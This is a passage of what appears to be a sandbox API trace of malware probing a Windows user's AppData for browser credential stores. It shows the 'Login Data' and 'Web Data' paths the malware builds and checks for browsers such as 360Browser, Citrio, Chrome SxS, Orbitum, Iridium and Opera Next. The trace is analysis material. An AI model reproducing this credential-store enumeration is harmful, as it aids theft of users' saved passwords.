wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 69 [0145.172] GetProcessHeap () returned 0x690000 [0145.172] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8e) returned 0x6ac288 [0145.172] GetProcessHeap () returned 0x690000 [0145.172] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.174] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 0 [0145.174] GetProcessHeap () returned 0x690000 [0145.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.175] GetProcessHeap () returned 0x690000 [0145.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.175] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.177] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 83 [0145.177] GetProcessHeap () returned 0x690000 [0145.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xaa) returned 0x6ac2a0 [0145.177] GetProcessHeap () returned 0x690000 [0145.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.179] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 0 [0145.179] GetProcessHeap () returned 0x690000 [0145.179] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.179] GetProcessHeap () returned 0x690000 [0145.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.180] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.181] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 81 [0145.181] GetProcessHeap () returned 0x690000 [0145.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa6) returned 0x6ac298 [0145.181] GetProcessHeap () returned 0x690000 [0145.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.183] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 0 [0145.183] GetProcessHeap () returned 0x690000 [0145.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0145.184] GetProcessHeap () returned 0x690000 [0145.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.184] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.185] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 64 [0145.185] GetProcessHeap () returned 0x690000 [0145.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x84) returned 0x6ac278 [0145.186] GetProcessHeap () returned 0x690000 [0145.186] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.189] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 0 [0145.190] GetProcessHeap () returned 0x690000 [0145.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.192] GetProcessHeap () returned 0x690000 [0145.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.193] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.194] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 72 [0145.194] GetProcessHeap () returned 0x690000 [0145.194] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x94) returned 0x6ac288 [0145.194] GetProcessHeap () returned 0x690000 [0145.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.195] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 0 [0145.196] GetProcessHeap () returned 0x690000 [0145.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.196] GetProcessHeap () returned 0x690000 [0145.196] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.203] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.205] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 85 [0145.205] GetProcessHeap () returned 0x690000 [0145.205] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xae) returned 0x6ac2a0 [0145.205] GetProcessHeap () returned 0x690000 [0145.205] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.206] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 0 [0145.207] GetProcessHeap () returned 0x690000 [0145.207] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.207] GetProcessHeap () returned 0x690000 [0145.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.208] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.209] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 83 [0145.209] GetProcessHeap () returned 0x690000 [0145.209] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xaa) returned 0x6ac298 [0145.209] GetProcessHeap () returned 0x690000 [0145.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.211] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 0 [0145.211] GetProcessHeap () returned 0x690000 [0145.212] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0145.212] GetProcessHeap () returned 0x690000 [0145.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.213] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.213] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 66 [0145.213] GetProcessHeap () returned 0x690000 [0145.213] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x88) returned 0x6ac278 [0145.214] GetProcessHeap () returned 0x690000 [0145.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.215] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 0 [0145.215] GetProcessHeap () returned 0x690000 [0145.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.216] GetProcessHeap () returned 0x690000 [0145.216] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.216] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.217] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 74 [0145.217] GetProcessHeap () returned 0x690000 [0145.217] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x98) returned 0x6ac288 [0145.217] GetProcessHeap () returned 0x690000 [0145.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.218] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 0 [0145.219] GetProcessHeap () returned 0x690000 [0145.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.219] GetProcessHeap () returned 0x690000 [0145.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.220] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.221] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 82 [0145.221] GetProcessHeap () returned 0x690000 [0145.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa8) returned 0x6ac2a0 [0145.221] GetProcessHeap () returned 0x690000 [0145.221] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.222] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 0 [0145.223] GetProcessHeap () returned 0x690000 [0145.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.223] GetProcessHeap () returned 0x690000 [0145.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.224] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.225] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 80 [0145.225] GetProcessHeap () returned 0x690000 [0145.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa4) returned 0x6ac298 [0145.225] GetProcessHeap () returned 0x690000 [0145.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.226] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 0 [0145.227] GetProcessHeap () returned 0x690000 [0145.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0145.227] GetProcessHeap () returned 0x690000 [0145.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.228] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.228] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 63 [0145.229] GetProcessHeap () returned 0x690000 [0145.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6ac278 [0145.229] GetProcessHeap () returned 0x690000 [0145.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.230] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 0 [0145.230] GetProcessHeap () returned 0x690000 [0145.231] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.231] GetProcessHeap () returned 0x690000 [0145.231] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.232] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.233] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 71 [0145.233] GetProcessHeap () returned 0x690000 [0145.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x92) returned 0x6ac288 [0145.233] GetProcessHeap () returned 0x690000 [0145.233] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.234] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 0 [0145.234] GetProcessHeap () returned 0x690000 [0145.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.235] GetProcessHeap () returned 0x690000 [0145.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.235] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.236] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 72 [0145.236] GetProcessHeap () returned 0x690000 [0145.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x94) returned 0x6ac2a0 [0145.236] GetProcessHeap () returned 0x690000 [0145.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.238] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 0 [0145.238] GetProcessHeap () returned 0x690000 [0145.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.238] GetProcessHeap () returned 0x690000 [0145.238] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.251] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.253] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 70 [0145.253] GetProcessHeap () returned 0x690000 [0145.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x90) returned 0x6ac298 [0145.253] GetProcessHeap () returned 0x690000 [0145.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.255] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 0 [0145.255] GetProcessHeap () returned 0x690000 [0145.256] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0145.256] GetProcessHeap () returned 0x690000 [0145.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.256] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.257] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 53 [0145.257] GetProcessHeap () returned 0x690000 [0145.257] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6e) returned 0x6ac278 [0145.257] GetProcessHeap () returned 0x690000 [0145.258] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.259] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 0 [0145.259] GetProcessHeap () returned 0x690000 [0145.260] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.260] GetProcessHeap () returned 0x690000 [0145.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.261] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.261] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 61 [0145.262] GetProcessHeap () returned 0x690000 [0145.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7e) returned 0x6ac288 [0145.262] GetProcessHeap () returned 0x690000 [0145.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.263] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 0 [0145.263] GetProcessHeap () returned 0x690000 [0145.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.264] GetProcessHeap () returned 0x690000 [0145.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.265] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.266] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 72 [0145.266] GetProcessHeap () returned 0x690000 [0145.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x94) returned 0x6ac2a0 [0145.266] GetProcessHeap () returned 0x690000 [0145.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.267] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 0 [0145.267] GetProcessHeap () returned 0x690000 [0145.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.268] GetProcessHeap () returned 0x690000 [0145.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.268] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.269] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 70 [0145.269] GetProcessHeap () returned 0x690000 [0145.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x90) returned 0x6ac298 [0145.269] GetProcessHeap () returned 0x690000 [0145.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.271] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 0 [0145.271] GetProcessHeap () returned 0x690000 [0145.271] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0145.271] GetProcessHeap () returned 0x690000 [0145.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.272] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.273] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 53 [0145.273] GetProcessHeap () returned 0x690000 [0145.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6e) returned 0x6ac278 [0145.273] GetProcessHeap () returned 0x690000 [0145.274] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.275] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 0 [0145.275] GetProcessHeap () returned 0x690000 [0145.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.276] GetProcessHeap () returned 0x690000 [0145.276] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.276] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.277] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 61 [0145.277] GetProcessHeap () returned 0x690000 [0145.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7e) returned 0x6ac288 [0145.277] GetProcessHeap () returned 0x690000 [0145.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.279] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 0 [0145.279] GetProcessHeap () returned 0x690000 [0145.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.279] GetProcessHeap () returned 0x690000 [0145.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8100 | out: hHeap=0x690000) returned 1 [0145.280] GetProcessHeap () returned 0x690000 [0145.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6a8100 [0145.280] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0145.281] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6a8100 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0145.282] GetProcessHeap () returned 0x690000 [0145.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8368 [0145.283] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.284] wvsprintfW (in: param_1=0x6a8368, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 89 [0145.284] GetProcessHeap () returned 0x690000 [0145.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb6) returned 0x6ac2f8 [0145.284] GetProcessHeap () returned 0x690000 [0145.284] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.286] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 0 [0145.286] GetProcessHeap () returned 0x690000 [0145.287] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2f8 | out: hHeap=0x690000) returned 1 [0145.292] GetProcessHeap () returned 0x690000 [0145.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8368 [0145.293] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.294] wvsprintfW (in: param_1=0x6a8368, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 87 [0145.294] GetProcessHeap () returned 0x690000 [0145.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb2) returned 0x6ac2f0 [0145.294] GetProcessHeap () returned 0x690000 [0145.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.296] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 0 [0145.296] GetProcessHeap () returned 0x690000 [0145.297] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2f0 | out: hHeap=0x690000) returned 1 [0145.297] GetProcessHeap () returned 0x690000 [0145.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8368 [0145.298] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.299] wvsprintfW (in: param_1=0x6a8368, param_2="%s%s\\Login Data", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 70 [0145.299] GetProcessHeap () returned 0x690000 [0145.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x90) returned 0x6ac2d0 [0145.299] GetProcessHeap () returned 0x690000 [0145.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8368 | out: hHeap=0x690000) returned 1 [0145.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.301] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 0 [0145.301] GetProcessHeap () returned 0x690000 [0145.302] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2d0 | out: hHeap=0x690000) returned 1 [0145.303] GetProcessHeap () returned 0x690000 [0145.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8368 [0145.303] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.305] wvsprintfW (in: param_1=0x6a8368, param_2="%s%s\\Default\\Login Data", arglist=0x19f9ec | out: 